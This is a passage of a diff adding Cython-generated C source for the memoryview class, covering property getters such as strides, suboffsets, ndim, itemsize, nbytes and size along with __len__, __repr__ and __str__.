NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.strides.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr2__pyx_v_suboffset; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + __pyx_t_1 = (__pyx_v_self->view.suboffsets == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PySequence_Multiply(__pyx_tuple__6, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + } + + /* "View.MemoryView":584 + * return (-1,) * self.view.ndim + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.suboffsets + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.suboffsets; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr2__pyx_v_suboffset = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr2__pyx_v_suboffset); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.suboffsets.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":588 + * @property + * def ndim(self): + * return self.view.ndim # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 588, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.ndim.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":592 + * @property + * def itemsize(self): + * return self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.itemsize.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":596 + * @property + * def nbytes(self): + * return self.size * self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_size); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.nbytes.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + __pyx_t_1 = (__pyx_v_self->_size == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":601 + * def size(self): + * if self._size is None: + * result = 1 # <<<<<<<<<<<<<< + * + * for length in self.view.shape[:self.view.ndim]: + */ + __Pyx_INCREF(__pyx_int_1); + __pyx_v_result = __pyx_int_1; + + /* "View.MemoryView":603 + * result = 1 + * + * for length in self.view.shape[:self.view.ndim]: # <<<<<<<<<<<<<< + * result *= length + * + */ + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_t_5 = PyInt_FromSsize_t((__pyx_t_2[0])); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_5); + __pyx_t_5 = 0; + + /* "View.MemoryView":604 + * + * for length in self.view.shape[:self.view.ndim]: + * result *= length # <<<<<<<<<<<<<< + * + * self._size = result + */ + __pyx_t_5 = PyNumber_InPlaceMultiply(__pyx_v_result, __pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 604, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF_SET(__pyx_v_result, __pyx_t_5); + __pyx_t_5 = 0; + } + + /* "View.MemoryView":606 + * result *= length + * + * self._size = result # <<<<<<<<<<<<<< + * + * return self._size + */ + __Pyx_INCREF(__pyx_v_result); + __Pyx_GIVEREF(__pyx_v_result); + __Pyx_GOTREF(__pyx_v_self->_size); + __Pyx_DECREF(__pyx_v_self->_size); + __pyx_v_self->_size = __pyx_v_result; + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + } + + /* "View.MemoryView":608 + * self._size = result + * + * return self._size # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->_size); + __pyx_r = __pyx_v_self->_size; + goto __pyx_L0; + + /* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.size.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + __pyx_t_1 = (__pyx_v_self->view.ndim >= 1); + if (__pyx_t_1) { + + /* "View.MemoryView":612 + * def __len__(self): + * if self.view.ndim >= 1: + * return self.view.shape[0] # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_r = (__pyx_v_self->view.shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + } + + /* "View.MemoryView":614 + * return self.view.shape[0] + * + * return 0 # <<<<<<<<<<<<<< + * + * def __repr__(self): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":618 + * def __repr__(self): + * return "" % (self.base.__class__.__name__, + * id(self)) # <<<<<<<<<<<<<< + * + * def __str__(self): + */ + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_id, ((PyObject *)__pyx_v_self)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 618, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "View.MemoryView":621 + * + * def __str__(self): + * return "" % (self.base.__class__.__name__,) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyTuple_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_object, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_c_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_c_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_c_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_c_contig", 0); + + /* "View.MemoryView":627 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 627, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":628 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return 